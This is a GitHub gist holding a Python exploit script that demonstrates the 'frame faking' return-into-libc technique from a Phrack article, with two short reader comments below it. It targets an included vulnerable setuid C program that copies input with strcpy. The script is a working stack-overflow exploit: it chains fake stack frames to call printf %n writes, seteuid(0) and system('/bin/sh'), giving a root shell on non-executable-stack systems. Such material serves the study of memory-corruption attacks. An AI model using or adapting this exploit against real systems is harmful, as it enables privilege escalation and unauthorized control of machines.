Skip to content

Instantly share code, notes, and snippets.

@mgeeky
Last active May 15, 2023 17:33
Show Gist options
  • Save mgeeky/b509b5e008e1d82a302eab6e918b27e5 to your computer and use it in GitHub Desktop.
Save mgeeky/b509b5e008e1d82a302eab6e918b27e5 to your computer and use it in GitHub Desktop.
Exploit presenting `frame faking` technique to chain advanced return-into-libc payloads in non-exec stack environment
#!/usr/bin/python
#
# Example of Frame Faking technique used to construct more advanced
# return-into-libc payloads in non-exec stack environment, as described in:
# The advanced return-into-lib(c) exploits
# by Nergal <[email protected]>
# (http://phrack.org/issues/58/4.html)
#
# To be used:
# $ ./bonx `./exp-chained-fake-frame.py`
#
'''
/* Compilation:
* $ gcc -fno-stack-protector -o bonx bonx.c
**/
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char b[256];
seteuid(getuid());
strcpy(b, argv[1]);
printf("%s", b);
fflush(stdout);
return 0;
}
'''
import struct
import sys
# CONFIGURATION DEPENDING ON PLATFORM, LIBC VER
# =================================
LIBC_IMAGEBASE = 0xb7e97000
BUFFER_ADDR = 0xbffff4d0
LEAVE_RET = 0x0804851c
# Functions within libc-2.11.2
pprintf = struct.pack("<I", LIBC_IMAGEBASE + 0x46f90) # _IO_printf@@GLIBC_2.0
psystem = struct.pack("<I", LIBC_IMAGEBASE + 0x38fb0) # system@@GLIBC_2.0
pseteuid = struct.pack("<I",LIBC_IMAGEBASE + 0xc47ff) # seteuid@@GLIBC_2.0
pexit = struct.pack("<I", LIBC_IMAGEBASE + 0x2f0c0) # exit@@GLIBC_2.0
# =================================
def conv(x):
return struct.pack("<I", x + BUFFER_ADDR)
junk = 'A' * 144
strings = "/bin/shXXYY%n"
binsh = conv(0x103)
binshnul = conv(0x10a)
setuidparam = conv(0x7c)
exitparam = conv(0xd4)
printffmt = conv(0x10e)
leaveret = struct.pack("<I", LEAVE_RET)
# Fake frames addresses
fake_ebp0 = conv(0x60)
fake_ebp1 = conv(0x80)
fake_ebp2 = conv(0x90)
fake_ebp3 = conv(0xa4)
fake_ebp4 = conv(0xb4)
fake_ebp5 = conv(0xc8)
fake_ebp6 = conv(0xc4)
# Pre-filling buffer
exploit = junk
# printf("%n", setuidparam);
exploit += fake_ebp1 + pprintf + leaveret + printffmt + setuidparam
# seteuid(0)
exploit += "X" * 12 + fake_ebp2 + pseteuid + leaveret + "XXXX"
# printf("%n", &binsh[7]);
exploit += fake_ebp3 + pprintf + leaveret + printffmt + binshnul
# system("/bin/sh")
exploit += fake_ebp4 + psystem + leaveret + binsh
# printf("%n", &binsh[7]);
exploit += fake_ebp5 + pprintf + leaveret + printffmt + exitparam
# exit(0)
exploit += fake_ebp5 + pexit + leaveret + exitparam
# fill up to a boundary of 264 bytes overflowing stack-based buffer
exploit += 'B' * (264 - len(exploit))
# Preparing chained return-into-libc initial fake frame
exploit += fake_ebp0 + leaveret
# Append additional filling and strings
exploit += 'C' * (324 - len(exploit) - len(strings) - 4)
exploit += strings
sys.stdout.write(exploit)
@theo-shin
Copy link

hmm, interesting but not sure what this tool does exactly.. Any detailed explanation for this tools? Thank you.

@cyberheartmi9
Copy link

nice ShO0t bro

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment